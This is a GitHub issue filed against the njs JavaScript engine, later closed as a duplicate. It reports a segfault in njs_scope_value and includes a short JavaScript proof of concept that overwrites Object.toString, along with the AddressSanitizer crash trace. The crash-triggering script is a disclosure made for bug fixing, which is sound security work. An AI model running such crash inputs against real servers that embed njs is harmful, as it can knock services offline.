
SEGV src/njs_scope.h:73 in njs_scope_value #479

Closed
xmzyshypnc opened this issue Mar 2, 2022 · 1 comment

Comments

xmzyshypnc commented Mar 2, 2022

Environment

OS: Linux leanderwang-LC2 5.13.0-30-generic #33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit: f65981b
Version: 0.7.3
Build:

```sh
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
```

PoC

```js
function main() {
    function func1(v1, v2) {
        // Overwrite Object.toString with the function object passed in (func1 itself).
        Object.toString = v1;

        function func2() {
            try {
                // Property lookup coerces Object to a string via the overwritten toString,
                // then the result is called; exceptions are swallowed.
                var v9 = JSON[Object]();
            } catch (v10) {} finally {}
        }
        func2(func2, func1);
    }
    func1(func1);
}
main();
```

Stack dump

```
AddressSanitizer:DEADLYSIGNAL

==1797452==ERROR: AddressSanitizer: SEGV on unknown address 0x623740000128 (pc 0x55b5eda44bd3 bp 0x7ffd8f57c8b0 sp 0x7ffd8f57c080 T0)
==1797452==The signal is caused by a READ memory access.
#0 0x55b5eda44bd2 in njs_scope_value src/njs_scope.h:73
#1 0x55b5eda44bd2 in njs_scope_valid_value src/njs_scope.h:83
#2 0x55b5eda44bd2 in njs_vmcode_interpreter src/njs_vmcode.c:153
#3 0x55b5edaa0aba in njs_function_lambda_call src/njs_function.c:703
#4 0x55b5eda470fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#5 0x55b5edaa0aba in njs_function_lambda_call src/njs_function.c:703
#6 0x55b5eda470fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#7 0x55b5eda410ba in njs_vm_start src/njs_vm.c:553
#8 0x55b5eda2a3f8 in njs_process_script src/njs_shell.c:890
#9 0x55b5eda2aebf in njs_process_file src/njs_shell.c:619
#10 0x55b5eda2c21f in main src/njs_shell.c:303
#11 0x7f9edef54082 in __libc_start_main ../csu/libc-start.c:308
#12 0x55b5eda27c4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/njs_scope.h:73 in njs_scope_value
==1797452==ABORTING
```

Credit

xmzyshypnc (@xmzyshypnc) and P1umer (@P1umer)

xeioex (Contributor) commented Apr 6, 2022

Duplicate of #467

xeioex closed this as completed Apr 6, 2022